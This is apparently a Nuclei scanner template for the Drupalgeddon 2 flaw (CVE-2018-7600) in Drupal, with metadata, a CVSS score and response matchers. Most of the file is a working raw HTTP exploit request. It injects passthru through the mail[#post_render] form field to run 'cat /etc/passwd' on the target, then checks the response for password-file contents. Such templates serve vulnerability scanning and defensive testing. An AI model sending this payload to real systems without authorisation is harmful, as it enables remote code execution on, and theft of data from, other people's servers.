61 lines
1.9 KiB
YAML
61 lines
1.9 KiB
YAML
id: CVE-2018-7600
|
|
|
|
info:
|
|
name: Drupal Drupalgeddon 2 RCE
|
|
author: pikpikcu
|
|
severity: critical
|
|
reference: https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2018-7600
|
|
tags: cve,cve2018,drupal,rce
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.80
|
|
cve-id: CVE-2018-7600
|
|
cwe-id: CWE-20
|
|
description: "Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations."
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: application/json
|
|
Referer: {{Hostname}}/user/register
|
|
X-Requested-With: XMLHttpRequest
|
|
Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663
|
|
|
|
-----------------------------99533888113153068481322586663
|
|
Content-Disposition: form-data; name="mail[#post_render][]"
|
|
|
|
passthru
|
|
-----------------------------99533888113153068481322586663
|
|
Content-Disposition: form-data; name="mail[#type]"
|
|
|
|
markup
|
|
-----------------------------99533888113153068481322586663
|
|
Content-Disposition: form-data; name="mail[#markup]"
|
|
|
|
cat /etc/passwd
|
|
-----------------------------99533888113153068481322586663
|
|
Content-Disposition: form-data; name="form_id"
|
|
|
|
user_register_form
|
|
-----------------------------99533888113153068481322586663
|
|
Content-Disposition: form-data; name="_drupal_ajax"
|
|
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "application/json"
|
|
part: header
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0"
|
|
part: body
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|